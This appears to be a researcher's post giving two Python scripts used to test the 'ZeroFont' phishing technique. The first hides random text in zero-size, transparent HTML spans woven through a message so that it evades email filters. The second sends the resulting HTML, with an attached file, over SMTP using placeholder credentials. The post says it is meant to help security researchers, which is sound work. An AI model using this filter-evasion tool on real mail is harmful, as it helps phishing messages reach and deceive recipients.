Below are the scripts that I used to test how "The ZeroFont Exploit Continues"...
#!/usr/bin/python
# Allow the first 50 characters of the message to not have zero fonts.
# Allow for if a link is found within the message to keep the link in tact.
import random
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
messageSpacing = 50 # How many characters from the beginning to not encode
newMessage = ''
f = open('message.txt', 'r')
for line in f:
letterCount = 0
counter = random.randint(1,4)
htmlChar = False
for letter in line.replace('\n',''):
newMessage += letter
if letter == '<':
htmlChar = True
letterCount += 1
messageSpacing -= 1
elif letter == '>':
htmlChar = False
letterCount += 1
messageSpacing -= 1
elif htmlChar == False:
if messageSpacing > 0:
messageSpacing -= 1
elif letterCount >= counter:
letterCount = 0
counter = random.randint(1,4)
elif letterCount == 1:
randStr = ''
for i in range(0,random.randint(3,12)):
randStr += alphabet[random.randint(0,61)]
#newMessage += '<span style="FONT-SIZE: 0px">' + randStr + '</span>'
newMessage += '<span style="font-size:0px;color:transparent">' + randStr + '</span>'
letterCount += 1
else:
letterCount += 1
newMessage += '<br />'
print "<html><body>"
print newMessage
print "</body></html>"
---
Script to send the Email
---
#!/usr/bin/python
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
msg = MIMEMultipart('alternative')
msg['Subject'] = "ZeroFont Exploit"
msg['From'] = "from_email"
msg['To'] = "to_email"
# Attach the HTML Message
htmlMsg = ''
f = open('t', 'r')
for line in f:
htmlMsg += line.strip()
htmlPart = MIMEText(htmlMsg, 'html')
msg.attach(htmlPart)
# Attach an Attachment
f = open('script', 'rb')
filePart = MIMEBase('application', 'octet-stream')
filePart.set_payload((f).read())
encoders.encode_base64(filePart)
filePart.add_header('Content-Disposition', "attachment; filename=script")
msg.attach(filePart)
fromAddress='from_email'
toAddress='to_email'
username='username'
password='password'
server = smtplib.SMTP('smtp.server.com:1527')
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg.as_string())
server.quit()
These scripts are meant to assist in security researchers thwarting this vulnerability that phishing emails are exploiting in email filters.